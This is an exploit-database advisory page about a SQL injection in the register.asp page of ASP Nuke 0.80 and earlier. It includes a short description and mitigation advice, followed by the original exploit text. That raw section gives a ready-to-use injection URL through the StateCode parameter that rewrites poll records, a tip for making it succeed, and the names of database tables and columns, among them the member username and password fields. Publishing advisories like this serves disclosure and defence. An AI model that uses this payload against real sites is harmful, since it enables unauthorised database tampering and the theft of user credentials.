header-logo
Suggest Exploit
vendor:
ASP Nuke
by:
ajann
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ASP Nuke
Affected Version From: 0.80
Affected Version To: 0.80
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability

ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. ASP Nuke is an extensible framework that allows you to upgrade and add applications to the website quickly and easily. It uses a modular architecture allowing others to rapidly develop new modules and site operators to re-organize the layout and navigation for their site. An attacker can exploit a SQL injection vulnerability in the register.asp page of ASPNuke version 0.80 and earlier to execute arbitrary SQL commands on the underlying database. The vulnerable parameter is the StateCode parameter, which is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the register.asp page.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being used in SQL queries. It is also recommended to use parameterized queries instead of dynamic SQL queries.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author :  ajann
# S.Page :  http://www.aspnuke.com
# D.Page :  http://sourceforge.net/project/showfiles.php?group_id=92470

*******************************************************************************

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-

ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerability::
_________________

###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....

Example = Poll Update

///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register

Note: Change UserName because ; failed:already username dont write.

Some tables,columns
___________________

[tblMember]    |  [FaqQuestion]
MemberID       |  QuestionID
Username       |  DocumentID
Password       |  Question
Firstname      |  Answer
Middlename     |  Active
EmailAddress   |  OrderNo
..             |  ..


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-19]